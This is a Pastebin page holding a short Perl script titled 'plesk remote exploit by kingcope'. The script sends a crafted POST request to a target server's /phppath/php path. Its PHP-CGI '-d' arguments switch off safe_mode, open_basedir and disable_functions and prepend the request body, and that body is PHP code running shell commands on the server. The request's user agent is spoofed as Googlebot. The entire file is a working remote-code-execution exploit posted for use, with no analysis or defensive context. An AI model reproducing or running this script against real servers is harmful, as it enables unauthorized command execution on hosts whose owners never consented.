Advertisement
Guest User

pretty-lolcope-simple.pl

a guest
Jun 5th, 2013
541
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.36 KB | None | 0 0
  1. #plesk remote exploit by kingcope
  2. #all your base belongs to me :>
  3. use strict;
  4. use warnings;
  5. use IO::Socket;
  6. use URI::Escape;
  7. main {
  8. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
  9.     PeerPort => 80,
  10.     Proto    => 'tcp') or die "OH GOD HOW DID THIS GET HERE I AM NOT GOOD WITH SOCKETS";
  11. my $pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
  12. my $arguments = uri_escape("-d","\0-\377"). "+" .
  13.     uri_escape("allow_url_include=on","\0-\377"). "+" .
  14.     uri_escape("-d","\0-\377"). "+" .
  15.     uri_escape("safe_mode=off","\0-\377"). "+" .
  16.     uri_escape("-d","\0-\377"). "+" .
  17.     uri_escape("suhosin.simulation=on","\0-\377"). "+" .
  18.     uri_escape("-d","\0-\377"). "+" .
  19.     uri_escape("disable_functions=\"\"","\0-\377"). "+" .
  20.     uri_escape("-d","\0-\377"). "+" .
  21.     uri_escape("open_basedir=none","\0-\377"). "+" .
  22.     uri_escape("-d","\0-\377"). "+" .
  23.     uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
  24.     uri_escape("-n","\0-\377");
  25. my $path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
  26. print $sock "POST /$path?$arguments HTTP/1.1\r\n"
  27.     ."Host: $ARGV[0]\r\n"
  28.     ."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
  29.     ."Content-Type: application/x-www-form-urlencoded\r\n"
  30.     ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
  31. while(<$sock>) {
  32.     print;
  33.     }
  34. }
  35. &main();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement